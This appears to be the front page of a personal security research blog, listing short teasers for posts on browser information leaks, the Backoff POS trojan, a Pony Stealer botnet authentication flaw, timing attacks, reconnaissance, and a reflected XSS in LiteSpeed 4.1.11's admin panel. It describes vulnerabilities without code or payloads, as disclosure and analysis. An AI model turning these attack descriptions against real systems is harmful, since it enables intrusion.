Hi, welcome to my blog here are some of the research I’ve done so far –
An important step in any targeted attack is reconnaissance. The more information an attacker can obtain on the victim the greater the chances for a successful exploitation and infiltration. Recently, I’ve uncovered two information disclosure vulnerabilities affecting three of the major web browsers which can be leveraged to leak out a vast range of installed…
This post is going to be a follow up from a research which dates back to December 2014, called “The Backoff POS Trojan operation”. Back then, one of the key conclusions highlighted from the report is that fraudsters are adopting new tactics in order to attack retailers. This new attack vector is to compromise DVR boxes,…
How the Pony Stealer Botnet’s Weak Server-Side Security Enabled Exploitation The Pony Stealer botnet, notorious for its ability to harvest credentials and sensitive data, had a flawed server-side authentication mechanism. This post delves into a vulnerability I discovered in Pony Stealer’s authorization and authentication practices, highlighting implementation oversights, the role of session handling, and how…
Timing attacks has proven practical since 96′ as shown in a paper by Paul C. Kocher. In his paper Paul demonstrate how, by effectively measuring the amount of time required for private key operation, one could completely uncover the private key. This attack was shown to be effective against widely known crypto-systems such as Diffie-Hellman, RSA and…
Every meticulous APT attack starts with a comprehensive intelligence gathering that includes getting to know the target before proceeding to a more invasive act. In this research paper, I shall discuss the reconnaissance process performed on a potential target from the perspective of the adversary. This demonstration will show how much information can be harvested…
On July 29, 2014, the US-CERT (Computer Emergency Readiness Team) issued an alert regarding a new Point of Sale malware it dubbed Backoff – the first public disclosure of this threat. The name was probably coined after a string found in the code of one of the versions of the variant that was analyzed by…
A vulnerability I’ve found quite some time ago in LiteSpeed <= 4.1.11 HTTP server. Basically a simple reflected XSS(Cross Site Scripting) in the administrator panel which is another instance of the HTTP server running on port 7080. If an attacker succeed in convincing an administrator with an active session to enter a maliciously crafted link…
[RECOVERED FROM MY OLD BLOGS]Overview:Desert Scroll is an old project of mine which i wrote in perl couple of years agoand basicly its an implementation of a Book encryption Loading && Mapping the key file:at first before every encryption/decryption of plain text a key is being loaded into the memory of the script/program and then…
Kerner On Security 